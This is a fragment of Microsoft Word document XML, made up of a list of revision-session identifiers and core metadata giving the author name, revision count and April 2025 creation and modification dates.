    <w:rsid w:val="009E1CEE"/>
    <w:rsid w:val="009F033F"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="009F62A9"/>
    <w:rsid w:val="00A010DD"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A26393"/>
    <w:rsid w:val="00A37396"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00A7473A"/>
    <w:rsid w:val="00AA229C"/>
    <w:rsid w:val="00AA2B87"/>
    <w:rsid w:val="00AA3B0A"/>
    <w:rsid w:val="00AB13BC"/>
    <w:rsid w:val="00AC78CC"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AD7A20"/>
    <w:rsid w:val="00AE14CB"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE1FDE"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00AF1736"/>
    <w:rsid w:val="00AF1D28"/>
    <w:rsid w:val="00AF5257"/>
    <w:rsid w:val="00B11A7C"/>
    <w:rsid w:val="00B138A2"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B22F30"/>
    <w:rsid w:val="00B276CF"/>
    <w:rsid w:val="00B3432D"/>
    <w:rsid w:val="00B34335"/>
    <w:rsid w:val="00B57D01"/>
    <w:rsid w:val="00B70330"/>
    <w:rsid w:val="00B704FB"/>
    <w:rsid w:val="00B7424D"/>
    <w:rsid w:val="00B921B9"/>
    <w:rsid w:val="00B929E1"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BB326E"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00C00F81"/>
    <w:rsid w:val="00C03FCA"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C35863"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C37652"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C60003"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C90DC3"/>
    <w:rsid w:val="00C93DCC"/>
    <w:rsid w:val="00CA342E"/>
    <w:rsid w:val="00CB5865"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CE02AD"/>
    <w:rsid w:val="00CF5012"/>
    <w:rsid w:val="00D100E8"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D24928"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D27F00"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D37F14"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D56329"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D771C7"/>
    <w:rsid w:val="00D828FA"/>
    <w:rsid w:val="00D86590"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DD55D1"/>
    <w:rsid w:val="00DD7666"/>
    <w:rsid w:val="00E033D2"/>
    <w:rsid w:val="00E11CF6"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E629BB"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00E844DA"/>
    <w:rsid w:val="00E978AE"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC1203"/>
    <w:rsid w:val="00EC2D61"/>
    <w:rsid w:val="00ED32C0"/>
    <w:rsid w:val="00EE20CC"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00EF51E3"/>
    <w:rsid w:val="00EF597D"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F110C2"/>
    <w:rsid w:val="00F11C0C"/>
    <w:rsid w:val="00F13FD7"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F223E4"/>
    <w:rsid w:val="00F35C96"/>
    <w:rsid w:val="00F477DC"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F7254E"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F75DD9"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FB0270"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FE2979"/>
    <w:rsid w:val="00FE7FAB"/>
    <w:rsid w:val="00FF375C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543F"/>
  <w15:docId w15:val="{744A8435-34F4-4C3E-A1FE-DC28241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6D549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621BCC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621BC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6712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4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ляков</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Даниил Поляков</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-24T06:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-26T10:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>